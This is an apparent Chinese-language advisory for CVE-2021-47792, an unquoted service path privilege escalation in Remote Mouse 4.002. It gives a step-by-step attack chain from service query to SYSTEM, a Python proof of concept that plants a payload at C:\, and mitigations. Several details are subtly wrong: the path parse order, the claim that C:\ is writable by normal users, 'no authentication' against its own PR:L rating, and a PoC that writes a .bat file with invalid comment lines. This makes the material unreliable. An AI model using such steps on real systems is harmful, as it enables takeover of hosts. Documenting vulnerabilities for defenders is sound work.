CVE-2021-47792: Remote Mouse 4.002 未引用的服务路径本地提权漏洞

漏洞信息

漏洞编号

CVE-2021-47792

漏洞类型

未引用的服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Remote Mouse

漏洞概述

CVE-2021-47792是影响Remote Mouse 4.002版本的一个高危本地提权漏洞。该漏洞源于RemoteMouseService服务存在未引用的服务路径(Unquoted Service Path)问题。在Windows操作系统中，当服务可执行文件路径包含空格且未被引号包裹时，攻击者可以通过在路径中的目录放置恶意可执行文件来实现权限提升。本地低权限攻击者可以利用此漏洞在RemoteMouseService服务启动时自动执行恶意代码，从而获得系统(SYSTEM)级别的最高权限。由于该漏洞不需要用户交互且影响机密性、完整性和可用性三个方面，因此被评定为CVSS 7.8分的高危漏洞。Remote Mouse是一款流行的远程桌面控制软件，其服务以系统权限运行，使得此提权漏洞具有严重的实际危害。攻击者成功利用后可完全控制目标系统，执行任意操作，包括安装后门、窃取敏感数据或进一步横向移动。

技术细节

未引用的服务路径漏洞(Unquoted Service Path)是一种Windows本地提权技术。当Windows服务配置的可执行文件路径包含空格且未使用引号包裹时，服务启动程序会从左到右解析路径，并在每个空格处尝试查找并执行可执行文件。例如，如果服务路径为C:\Program Files\Remote Mouse\RemoteMouseService.exe，服务启动时会依次尝试执行：C:\Program.exe、C:\Program Files\RemoteMouseService.exe、C:\Program Files\Remote Mouse\RemoteMouseService.exe。攻击者可以利用这一特性，在C:\目录下放置名为Program.exe的恶意可执行文件，当服务重启时，该恶意文件将以SYSTEM权限被自动执行。在CVE-2021-47792中，Remote Mouse的RemoteMouseService服务存在此问题。攻击者首先需要将恶意可执行文件写入受影响目录，然后等待服务重启或通过其他方式触发服务重启，即可实现权限提升。由于RemoteMouseService默认以SYSTEM权限运行，攻击者无需认证即可获得系统最高权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统上安装的Remote Mouse软件版本(4.002)，并检查RemoteMouseService服务的配置信息。通过sc qc命令查询服务，提取BINARY_PATH_NAME字段，发现服务路径未被引号包裹且包含空格。

STEP 2

步骤2: 路径分析

攻击者分析服务路径，如C:\Program Files\Remote Mouse\RemoteMouseService.exe。Windows服务控制管理器会从左到右解析此路径，在每个空格处尝试查找可执行文件：先查找C:\Program.exe，然后是C:\Program Files\RemoteMouseService.exe。

STEP 3

步骤3: 恶意文件植入

攻击者将恶意可执行文件(如Program.exe)写入C:\根目录。由于C:\目录通常具有写权限(即使是低权限用户)，攻击者可以成功创建该文件。该恶意程序设计为以SYSTEM权限执行特定操作。

STEP 4

步骤4: 服务重启触发

攻击者需要等待服务重启以触发恶意代码执行。可以通过系统更新、重新启动、或其他服务管理操作(如sc stop和sc start命令，如果权限允许)来触发RemoteMouseService重启。

STEP 5

步骤5: 权限提升

当RemoteMouseService启动时，服务控制管理器首先查找并执行C:\Program.exe(攻击者的恶意文件)。由于服务以SYSTEM账户运行，恶意代码同样以SYSTEM权限被执行，实现本地权限提升。

STEP 6

步骤6: 持久化控制

攻击者成功提权后，可以执行任意系统操作，包括安装后门、创建新用户账户、窃取敏感数据或进一步在内网中横向移动，建立持久的控制通道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47792 PoC - Remote Mouse Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Remote Mouse 4.002

import os
import sys
import shutil
import subprocess

def check_vulnerability():
    """Check if Remote Mouse service exists and has unquoted path"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'RemoteMouseService'],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print("[+] RemoteMouseService found")
            # Extract the path (simplified for demonstration)
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH' in line:
                    print(f"[+] Service path: {line.strip()}")
                    if '"' not in line:
                        print("[!] Service path is unquoted - VULNERABLE")
                        return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_payload():
    """Generate malicious executable to be placed in unquoted path"""
    malicious_exe = "C:\\Program.exe"
    # In real attack, this would be a malicious executable
    # For demonstration, creating a simple batch script wrapper
    payload_code = '''@echo off
# Malicious code would be executed here with SYSTEM privileges
echo [+] Payload executed with SYSTEM privileges >> C:\\temp\\pwned.log
'''
    try:
        os.makedirs("C:\\temp", exist_ok=True)
        with open(malicious_exe.replace('.exe', '.bat'), 'w') as f:
            f.write(payload_code)
        print(f"[+] Payload created: {malicious_exe.replace('.exe', '.bat')}")
        return True
    except Exception as e:
        print(f"[-] Failed to create payload: {e}")
        return False

if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2021-47792 PoC - Remote Mouse Unquoted Service Path")
    print("=" * 60)
    
    if check_vulnerability():
        print("[+] Target is vulnerable")
        create_payload()
        print("[+] Wait for service restart to trigger payload execution")
    else:
        print("[-] Target is not vulnerable or RemoteMouseService not found")

影响范围

Remote Mouse 4.002及之前版本

防御指南

临时缓解措施

作为临时缓解措施，可以采取以下方法：1)手动修改注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteMouseService的ImagePath值，使用引号包裹完整路径；2)限制C:\目录的写入权限，确保普通用户无法创建可执行文件；3)使用ICACLS命令设置严格的访问控制列表；4)部署端点检测与响应(EDR)解决方案，监控可疑进程执行。建议同时关注厂商更新，尽快完成版本升级以彻底消除该漏洞风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2021-47792
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2021-47792
3 Details https://www.cvedetails.com/cve/CVE-2021-47792/
4 VulDB https://vuldb.com/cve/CVE-2021-47792
5 Link https://www.exploit-db.com/exploits/50258
6 Link https://www.remotemouse.net/
7 Link https://www.vulncheck.com/advisories/remote-mouse-unquoted-service-path
8 Link https://www.exploit-db.com/exploits/50258